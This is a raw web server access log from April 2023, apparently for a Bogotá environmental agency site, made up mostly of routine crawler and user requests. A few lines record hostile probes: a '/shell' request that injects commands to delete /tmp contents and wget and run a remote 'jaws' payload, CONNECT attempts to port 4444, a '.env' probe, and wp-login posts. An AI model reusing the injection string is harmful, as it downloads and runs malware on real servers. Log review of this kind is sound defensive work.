172.22.2.4 - - [08/Apr/2023:01:18:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:01:20:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42992
201.245.192.253 - - [08/Apr/2023:01:20:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42678
216.245.221.92 - - [08/Apr/2023:01:20:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:01:19:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
207.46.13.218 - - [08/Apr/2023:01:21:02 -0500] "GET /images/pieza-dia-humedales-31-enero.jpg HTTP/1.1" 200 29095
201.245.192.253 - - [08/Apr/2023:01:21:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:01:24:46 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20No.%200001%20del%2011%20de%20junio%20de%202019.pdf HTTP/1.1" 304 -
216.245.221.92 - - [08/Apr/2023:01:25:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:01:24:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:01:24:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53551
201.245.192.253 - - [08/Apr/2023:01:26:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
40.77.167.141 - - [08/Apr/2023:01:28:48 -0500] "GET /BLA/resoluciones/AUTOS%202019/4263.pdf HTTP/1.1" 200 260050
201.245.192.253 - - [08/Apr/2023:01:30:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42992
201.245.192.253 - - [08/Apr/2023:01:30:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42678
40.77.167.237 - - [08/Apr/2023:01:30:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/2164.pdf HTTP/1.1" 304 -
40.77.189.58 - - [08/Apr/2023:01:30:27 -0500] "GET /SIIPEV/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Registros/images/sort_both.html HTTP/1.1" 200 1236
40.77.188.170 - - [08/Apr/2023:01:30:30 -0500] "GET /SIIPEV/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Registros/images/sort_asc.html HTTP/1.1" 200 1236
216.245.221.92 - - [08/Apr/2023:01:30:31 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.161 - - [08/Apr/2023:01:31:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1138.pdf HTTP/1.1" 304 -
172.22.2.4 - - [08/Apr/2023:01:29:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.89 - - [08/Apr/2023:01:31:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/4020.pdf HTTP/1.1" 304 -
201.245.192.253 - - [08/Apr/2023:01:31:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:01:30:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
216.245.221.92 - - [08/Apr/2023:01:35:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:01:36:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
172.22.2.4 - - [08/Apr/2023:01:35:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:01:37:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
40.77.167.186 - - [08/Apr/2023:01:37:55 -0500] "GET /images/humedal-principal-santa-maria-7-febrero.jpg HTTP/1.1" 200 86406
172.22.2.4 - - [08/Apr/2023:01:36:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58297
201.245.192.253 - - [08/Apr/2023:01:38:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
201.245.192.253 - - [08/Apr/2023:01:39:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
201.245.192.253 - - [08/Apr/2023:01:40:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42992
201.245.192.253 - - [08/Apr/2023:01:40:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42678
216.245.221.92 - - [08/Apr/2023:01:40:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.127 - - [08/Apr/2023:01:40:32 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:01:40:38 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_SENTENCIA%20C-554%20DE%202007.docx HTTP/1.1" 404 1037
172.22.2.4 - - [08/Apr/2023:01:41:04 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20jurisprudencial%20Sentencia%20C-366-11.doc HTTP/1.1" 200 59392
52.167.144.60 - - [08/Apr/2023:01:41:05 -0500] "GET /portaldeninos/2021/05/27/proteger-la-comadreja-en-bogota-es-salvaguardar-la-biodiversidad-de-la-ciudad/ HTTP/1.1" 200 105709
40.77.167.141 - - [08/Apr/2023:01:41:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2023.pdf HTTP/1.1" 200 205731
172.22.2.4 - - [08/Apr/2023:01:41:50 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
172.22.2.4 - - [08/Apr/2023:01:41:50 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [08/Apr/2023:01:41:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:01:42:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54414
201.245.192.253 - - [08/Apr/2023:01:44:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
216.245.221.92 - - [08/Apr/2023:01:45:31 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.89 - - [08/Apr/2023:01:47:10 -0500] "GET /forest/ HTTP/1.1" 200 12041
40.77.167.231 - - [08/Apr/2023:01:48:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/6181.pdf HTTP/1.1" 304 -
172.22.2.4 - - [08/Apr/2023:01:47:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:01:49:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
40.77.167.237 - - [08/Apr/2023:01:49:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/3834.pdf HTTP/1.1" 304 -
172.22.2.4 - - [08/Apr/2023:01:48:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [08/Apr/2023:01:50:31 -0500] "HEAD / HTTP/1.1" 200 -
18.236.182.41 - - [08/Apr/2023:01:52:17 -0500] "GET /caminatas-ecologicas-en-bogota-inscribete-y-participa-en-los-recorridos-de-abril.html HTTP/1.1" 200 868
18.236.182.41 - - [08/Apr/2023:01:52:17 -0500] "GET /cooperacion-internacional-postulate-para-la-coordinacion-ambiental-de-proyecto-con-la-union-europea-avantia.html HTTP/1.1" 200 1020
201.245.192.253 - - [08/Apr/2023:01:54:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:01:53:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [08/Apr/2023:01:55:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:01:54:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55211
172.22.2.4 - - [08/Apr/2023:01:59:12 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [08/Apr/2023:01:59:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
216.245.221.92 - - [08/Apr/2023:02:00:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:01:59:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
193.32.162.159 - - [08/Apr/2023:02:01:12 -0500] "GET / HTTP/1.1" 200 319
193.32.162.159 - - [08/Apr/2023:02:01:22 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
172.22.2.4 - - [08/Apr/2023:02:01:34 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%201%20del%205%20de%20Abril%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [08/Apr/2023:01:59:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
40.77.167.161 - - [08/Apr/2023:02:01:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3003.pdf HTTP/1.1" 200 463892
62.171.175.68 - - [08/Apr/2023:02:02:15 -0500] "CONNECT 157.90.120.57:4444 HTTP/1.1" 405 941
40.77.167.161 - - [08/Apr/2023:02:02:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4559.pdf HTTP/1.1" 200 333185
172.22.2.4 - - [08/Apr/2023:02:04:28 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7486
207.46.13.229 - - [08/Apr/2023:02:04:28 -0500] "-" 408 -
201.245.192.253 - - [08/Apr/2023:02:04:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
52.167.144.89 - - [08/Apr/2023:02:04:41 -0500] "GET /BLA/resoluciones/AUTOS%202022/1654.pdf HTTP/1.1" 304 -
216.245.221.92 - - [08/Apr/2023:02:05:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:02:04:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:02:07:03 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5604
172.22.2.4 - - [08/Apr/2023:02:05:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58297
69.63.184.116 - - [08/Apr/2023:02:07:32 -0500] "GET /images/incautan-animales-semana-santa-2023.jpeg HTTP/1.1" 200 36611
17.246.15.154 - - [08/Apr/2023:02:08:57 -0500] "-" 408 -
201.245.192.253 - - [08/Apr/2023:02:09:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
216.245.221.92 - - [08/Apr/2023:02:10:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.100 - - [08/Apr/2023:02:10:33 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:02:10:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:02:11:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58653
40.77.167.237 - - [08/Apr/2023:02:13:15 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12500
166.0.218.9 - - [08/Apr/2023:02:13:39 -0500] "GET / HTTP/1.1" 200 319
157.55.39.215 - - [08/Apr/2023:02:13:58 -0500] "GET /dia-mundial-del-agua-2023-programate-para-participar-en-estas-actividades-de-educacion-ambiental.html HTTP/1.1" 200 903
40.77.167.237 - - [08/Apr/2023:02:13:59 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12500
172.22.2.4 - - [08/Apr/2023:02:14:18 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
201.245.192.253 - - [08/Apr/2023:02:14:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
40.77.167.161 - - [08/Apr/2023:02:14:45 -0500] "GET /BLA/resoluciones/AUTOS%202017/3445.pdf HTTP/1.1" 200 307331
216.245.221.92 - - [08/Apr/2023:02:15:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.172 - - [08/Apr/2023:02:15:50 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
40.77.167.237 - - [08/Apr/2023:02:16:06 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
172.22.2.4 - - [08/Apr/2023:02:17:27 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [08/Apr/2023:02:16:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.161 - - [08/Apr/2023:02:18:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2691.pdf HTTP/1.1" 304 -
172.22.2.4 - - [08/Apr/2023:02:17:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58297
201.245.192.253 - - [08/Apr/2023:02:19:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
201.245.192.253 - - [08/Apr/2023:02:20:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42700
201.245.192.253 - - [08/Apr/2023:02:20:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42857
216.245.221.92 - - [08/Apr/2023:02:20:31 -0500] "HEAD / HTTP/1.1" 200 -
52.249.178.50 - - [08/Apr/2023:02:20:32 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 200 89855
13.68.191.192 - - [08/Apr/2023:02:21:00 -0500] "GET /portaldeninos/glosario/ HTTP/1.1" 200 97198
31.13.103.24 - - [08/Apr/2023:02:21:35 -0500] "GET /images/mejora-la-calidad-del-aire-en-bogota-5-abril.jpeg HTTP/1.1" 200 44341
52.249.178.50 - - [08/Apr/2023:02:22:35 -0500] "GET /portaldeninos/contactanos/ HTTP/1.1" 200 88135
172.22.2.4 - - [08/Apr/2023:02:22:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:02:24:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:02:23:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
52.234.179.163 - - [08/Apr/2023:02:25:22 -0500] "GET /portaldeninos/ruido/ HTTP/1.1" 200 88494
216.245.221.92 - - [08/Apr/2023:02:25:31 -0500] "HEAD / HTTP/1.1" 200 -
52.249.178.89 - - [08/Apr/2023:02:28:26 -0500] "GET /portaldeninos/corresponsal-ambiental/ HTTP/1.1" 200 93768
157.55.39.209 - - [08/Apr/2023:02:29:06 -0500] "GET /%C3%82%C2%BFquieres-aprender-sobre-jardines-verticales-esta-es-tu-oportunidad.html HTTP/1.1" 200 925
201.245.192.253 - - [08/Apr/2023:02:29:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:02:28:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.141 - - [08/Apr/2023:02:30:02 -0500] "GET /BLA/resoluciones/AUTOS%202022/3830.pdf HTTP/1.1" 200 654876
201.245.192.253 - - [08/Apr/2023:02:30:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42700
201.245.192.253 - - [08/Apr/2023:02:30:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42857
216.245.221.92 - - [08/Apr/2023:02:30:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:02:29:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
52.249.178.89 - - [08/Apr/2023:02:33:14 -0500] "GET /portaldeninos/aulas-ambientales-2/parque-ecologico-distrital-de-montana-entrenubes/ HTTP/1.1" 200 90406
201.245.192.253 - - [08/Apr/2023:02:34:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
66.249.79.97 - - [08/Apr/2023:02:34:49 -0500] "-" 408 -
216.245.221.92 - - [08/Apr/2023:02:35:31 -0500] "HEAD / HTTP/1.1" 200 -
52.249.178.89 - - [08/Apr/2023:02:35:31 -0500] "GET /portaldeninos/tipos-de-arboles-en-bogota/ HTTP/1.1" 200 109802
172.22.2.4 - - [08/Apr/2023:02:34:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:02:34:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56744
172.22.2.4 - - [08/Apr/2023:02:36:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
69.171.251.18 - - [08/Apr/2023:02:38:05 -0500] "GET /images/WhatsApp%20Image%202023-04-05%20at%2013.54.41.jpeg HTTP/1.1" 200 210747
207.46.13.218 - - [08/Apr/2023:02:38:19 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Fauna-gif.gif HTTP/1.1" 200 3779027
201.245.192.253 - - [08/Apr/2023:02:39:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
201.245.192.253 - - [08/Apr/2023:02:40:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42700
201.245.192.253 - - [08/Apr/2023:02:40:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42857
216.245.221.92 - - [08/Apr/2023:02:40:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:02:39:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.168 - - [08/Apr/2023:02:41:39 -0500] "GET /agendate- HTTP/1.1" 404 1034
172.22.2.4 - - [08/Apr/2023:02:40:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
172.22.2.4 - - [08/Apr/2023:02:43:25 -0500] "GET /BLA/boletinlegal/Circulares/2009/Circular%20Instructiva%20-%20Memorando%202009IE24363.pdf HTTP/1.1" 304 -
172.22.2.4 - - [08/Apr/2023:02:43:45 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8333
201.245.192.253 - - [08/Apr/2023:02:44:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
216.245.221.92 - - [08/Apr/2023:02:45:31 -0500] "HEAD / HTTP/1.1" 200 -
173.252.83.17 - - [08/Apr/2023:02:45:57 -0500] "-" 408 -
185.119.81.103 - - [08/Apr/2023:02:46:58 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [08/Apr/2023:02:46:59 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [08/Apr/2023:02:45:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:02:46:01 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 49131
172.22.2.4 - - [08/Apr/2023:02:46:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
201.245.192.253 - - [08/Apr/2023:02:49:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
216.245.221.92 - - [08/Apr/2023:02:50:31 -0500] "HEAD / HTTP/1.1" 200 -
52.249.178.116 - - [08/Apr/2023:02:50:55 -0500] "GET /portaldeninos/aire/ HTTP/1.1" 200 88215
52.234.179.63 - - [08/Apr/2023:02:52:06 -0500] "GET /portaldeninos/publicidad/ HTTP/1.1" 200 87569
52.249.178.116 - - [08/Apr/2023:02:52:08 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89306
172.22.2.4 - - [08/Apr/2023:02:51:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:02:52:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
201.245.192.253 - - [08/Apr/2023:02:54:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
216.245.221.92 - - [08/Apr/2023:02:55:31 -0500] "HEAD / HTTP/1.1" 200 -
20.25.1.44 - - [08/Apr/2023:02:56:10 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 200 89596
52.234.179.63 - - [08/Apr/2023:02:58:05 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
40.77.167.227 - - [08/Apr/2023:02:58:42 -0500] "GET /negocios-verdes-de-bogota-se-reuniran-este-fin-de-semana-en-el-centro-comercial-el-retiro.html HTTP/1.1" 200 902
52.167.144.89 - - [08/Apr/2023:02:58:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/2689.pdf HTTP/1.1" 304 -
52.234.179.63 - - [08/Apr/2023:02:59:02 -0500] "GET /portaldeninos/humedales-ramsar/ HTTP/1.1" 200 89255
172.22.2.4 - - [08/Apr/2023:02:57:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:02:59:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
40.77.167.237 - - [08/Apr/2023:02:59:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/1855.pdf HTTP/1.1" 304 -
172.22.2.4 - - [08/Apr/2023:02:58:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
40.77.167.141 - - [08/Apr/2023:03:00:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2653.pdf HTTP/1.1" 304 -
17.246.15.197 - - [08/Apr/2023:03:00:30 -0500] "-" 408 -
216.245.221.92 - - [08/Apr/2023:03:00:31 -0500] "HEAD / HTTP/1.1" 200 -
52.249.178.116 - - [08/Apr/2023:03:01:06 -0500] "GET /portaldeninos/los-arboles/ HTTP/1.1" 200 87546
201.245.192.253 - - [08/Apr/2023:03:04:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
196.188.75.135 - - [08/Apr/2023:03:04:18 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [08/Apr/2023:03:04:21 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/null HTTP/1.1" 404 1037
172.22.2.4 - - [08/Apr/2023:03:03:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [08/Apr/2023:03:05:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:03:04:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
52.249.178.116 - - [08/Apr/2023:03:05:55 -0500] "GET /portaldeninos/aulas-ambientales/ HTTP/1.1" 200 88416
52.249.178.116 - - [08/Apr/2023:03:07:04 -0500] "GET /portaldeninos/relatos-urbanos-de-los-ecosistemas-bogotanos-2/ HTTP/1.1" 200 88374
172.174.20.191 - - [08/Apr/2023:03:07:26 -0500] "GET /portaldeninos/fauna/ HTTP/1.1" 200 88429
201.245.192.253 - - [08/Apr/2023:03:09:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
216.245.221.92 - - [08/Apr/2023:03:10:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.100 - - [08/Apr/2023:03:10:33 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:03:09:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62202
40.77.167.231 - - [08/Apr/2023:03:11:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/2470.pdf HTTP/1.1" 304 -
172.22.2.4 - - [08/Apr/2023:03:12:08 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [08/Apr/2023:03:12:33 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [08/Apr/2023:03:12:34 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [08/Apr/2023:03:12:35 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [08/Apr/2023:03:12:35 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
172.22.2.4 - - [08/Apr/2023:03:12:36 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
20.124.207.242 - - [08/Apr/2023:03:13:46 -0500] "GET /portaldeninos/los-arboles/tips/ HTTP/1.1" 200 87677
201.245.192.253 - - [08/Apr/2023:03:14:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
216.245.221.92 - - [08/Apr/2023:03:15:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:03:14:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:03:15:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55211
207.46.13.229 - - [08/Apr/2023:03:17:36 -0500] "-" 408 -
201.245.192.253 - - [08/Apr/2023:03:19:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
201.245.192.253 - - [08/Apr/2023:03:20:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42525
201.245.192.253 - - [08/Apr/2023:03:20:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42855
216.245.221.92 - - [08/Apr/2023:03:20:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.127 - - [08/Apr/2023:03:21:33 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:03:21:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62202
172.22.2.4 - - [08/Apr/2023:03:23:27 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
201.245.192.253 - - [08/Apr/2023:03:24:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:03:25:22 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
216.245.221.92 - - [08/Apr/2023:03:25:31 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.161 - - [08/Apr/2023:03:27:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/1720.pdf HTTP/1.1" 304 -
172.22.2.4 - - [08/Apr/2023:03:26:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:03:27:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58297
201.245.192.253 - - [08/Apr/2023:03:29:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
201.245.192.253 - - [08/Apr/2023:03:30:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42525
201.245.192.253 - - [08/Apr/2023:03:30:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42855
40.77.167.231 - - [08/Apr/2023:03:30:26 -0500] "GET /bla/resoluciones/resoluciones%202012/0612.pdf HTTP/1.1" 304 -
216.245.221.92 - - [08/Apr/2023:03:30:31 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.141 - - [08/Apr/2023:03:32:31 -0500] "GET /bla/resoluciones/autos%202015/0329.pdf HTTP/1.1" 200 806758
172.22.2.4 - - [08/Apr/2023:03:32:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:03:34:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:03:33:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
216.245.221.92 - - [08/Apr/2023:03:35:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:03:39:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:03:38:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
62.171.175.68 - - [08/Apr/2023:03:39:56 -0500] "CONNECT 157.90.120.57:4444 HTTP/1.1" 405 941
201.245.192.253 - - [08/Apr/2023:03:40:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42525
201.245.192.253 - - [08/Apr/2023:03:40:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42855
216.245.221.92 - - [08/Apr/2023:03:40:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.97 - - [08/Apr/2023:03:40:33 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:03:39:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
201.245.192.253 - - [08/Apr/2023:03:44:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
216.245.221.92 - - [08/Apr/2023:03:45:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:03:44:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:03:46:13 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%206%20del%2019%20de%20julio%20de%202013.pdf HTTP/1.1" 304 -
172.22.2.4 - - [08/Apr/2023:03:44:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
